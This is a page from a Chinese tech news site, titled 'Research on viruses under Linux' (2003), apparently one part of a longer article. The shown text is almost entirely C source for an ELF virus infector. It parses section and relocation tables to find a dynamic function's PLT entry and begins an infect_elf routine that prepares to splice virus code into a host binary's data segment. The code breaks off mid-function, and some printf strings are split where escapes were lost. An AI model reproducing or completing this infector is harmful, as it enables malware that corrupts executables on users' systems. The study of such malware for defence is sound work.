天极传媒:
天极网
比特网
IT专家网
52PK游戏网
极客修
全国分站

北京上海广州深港南京福建沈阳成都杭州西安长春重庆大庆合肥惠州青岛郑州泰州厦门淄博天津无锡哈尔滨

产品
  • 网页
  • 产品
  • 图片
  • 报价
  • 下载
全高清投影机 净化器 4K电视曲面电视小家电滚筒洗衣机
您现在的位置: 天极网>新闻>

Linux系统下病毒的研究

天极论坛 2003-09-09 17:04 我要吐槽
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdrp->sh_type == SHT_DYNSYM) {
return do_dyn_symtab(fd, shdr, shdrp, sh_function);
}

++shdrp;
}
}

void do_rel(int *plt, int *offset, int fd, Elf32_Shdr *shdr, int sym)
{
Elf32_Rel *rel, *relp;
int i;

rel = (Elf32_Rel *)malloc(shdr->sh_size);
if (rel == NULL) {
perror("malloc");
exit(1);
}

if (lseek(fd, shdr->sh_offset, SEEK_SET) != shdr->sh_offset) {
perror("lseek");
exit(1);
}

if (read(fd, rel, shdr->sh_size) != shdr->sh_size) {
perror("read");
exit(1);
}

relp = rel;

for (i = 0; i < shdr->sh_size; i += sizeof(Elf32_Rel)) {
if (ELF32_R_SYM(relp->r_info) == sym) {
*plt = relp->r_offset;
*offset = relp - rel;
printf("offset %i
", *offset);
return;
}
++relp;
}

*plt = -1;
*offset = -1;
}

void find_rel(
int *plt,
int *offset,
int fd,
const char *string,
Elf32_Ehdr *ehdr, Elf32_Shdr *shdr,
const char *sh_function
)
{
Elf32_Shdr *shdrp = shdr;
int sym;
int i;

sym = get_sym_number(fd, ehdr, shdr, sh_function);
if (sym < 0) {
*plt = -1;
*offset = -1;
return;
}

for (i = 0; i < ehdr->e_shnum; i++) {
if (!strcmp(&string[shdrp->sh_name], ".rel.plt")) {
do_rel(plt, offset, fd, shdrp, sym);
return;
}

++shdrp;
}
}

void infect_elf(
char *host,
char *(*get_virus)(void),
int (*init_virus)(int, int, int, int, int, int),
int len,
const char *sh_function
)

{
Elf32_Ehdr ehdr;
Elf32_Shdr *shdr, *strtabhdr;
Elf32_Phdr *phdr;
char *pdata, *sdata;
int move = 0;
int od, fd;
int evaddr, text_start = -1, plt;
int sym_offset;
int bss_len, addlen;
int offset, pos, oshoff;
int plen, slen;
int i;
char null = 0;
struct stat stat;
char *string;
char tempname[8] = "vXXXXXX";

fd = open(host, O_RDONLY);
if (fd < 0) {
perror("open");
exit(1);
}

/* read the ehdr */

if (read(fd, &ehdr, sizeof(ehdr)) < 0) {
perror("read");
exit(1);
}

do_elf_checks(&ehdr);

/* modify the virus so that it knows the correct reentry point */

printf("host entry point: %x
", ehdr.e_entry);

/* allocate memory for phdr tables */

pdata = (char *)malloc(plen = sizeof(*phdr)*ehdr.e_phnum);
if (pdata == NULL) {
perror("malloc");
exit(1);
}

/* read the phdr's */

if (lseek(fd, ehdr.e_phoff, SEEK_SET) < 0) {
perror("lseek");
exit(1);
}

if (read(fd, pdata, plen) != plen) {
perror("read");
exit(1);
}
phdr = (Elf32_Phdr *)pdata;

/* allocated memory if required to accomodate the shdr tables */

sdata = (char *)malloc(slen = sizeof(*shdr)*ehdr.e_shnum);
if (sdata == NULL) {
perror("malloc");
exit(1);
}

/* read the shdr's */

if (lseek(fd, oshoff = ehdr.e_shoff, SEEK_SET) < 0) {
perror("lseek");
exit(1);
}

if (read(fd, sdata, slen) != slen) {
perror("read");
exit(1);
}

strtabhdr = &((Elf32_Shdr *)sdata)[ehdr.e_shstrndx];

string = (char *)malloc(strtabhdr->sh_size);
if (string == NULL) {
perror("malloc");
exit(1);
}

if (lseek(
fd, strtabhdr->sh_offset, SEEK_SET
) != strtabhdr->sh_offset) {
perror("lseek");
exit(1);
}

if (read(fd, string, strtabhdr->sh_size) != strtabhdr->sh_size) {
perror("read");
exit(1);
}

find_rel(
&plt, &sym_offset,
fd,
string,
&ehdr,
(Elf32_Shdr *)sdata,
sh_function
);
if (plt < 0) {
printf("No dynamic function: %s
", sh_function);
exit(1);
}

for (i = 0; i < ehdr.e_phnum; i++) {
if (phdr->p_type == PT_LOAD) {
if (phdr->p_offset == 0) {
text_start = phdr->p_vaddr;
} else {
if (text_start < 0) {
fprintf(stderr, "No text segment??
");
exit(1);
}

/* is this the data segment ? */
#ifdef DEBUG
printf("Found PT_LOAD segment...
");
printf(
"p_vaddr: 0x%x
"
"p_offset: %i
"
"p_filesz: %i
"
"p_memsz: %i
"
"
",
phdr->p_vaddr,
phdr->p_offset,
phdr->p_filesz,
phdr->p_memsz
);
#endif
offset = phdr->p_offset + phdr->p_filesz;
bss_len = phdr->p_memsz - phdr->p_filesz;

作者:责任编辑:)
请关注天极网天极新媒体 最酷科技资讯
扫码赢大奖
评论
* 网友发言均非本站立场,本站不在评论栏推荐任何网店、经销商,谨防上当受骗!
笔记本手机数码家电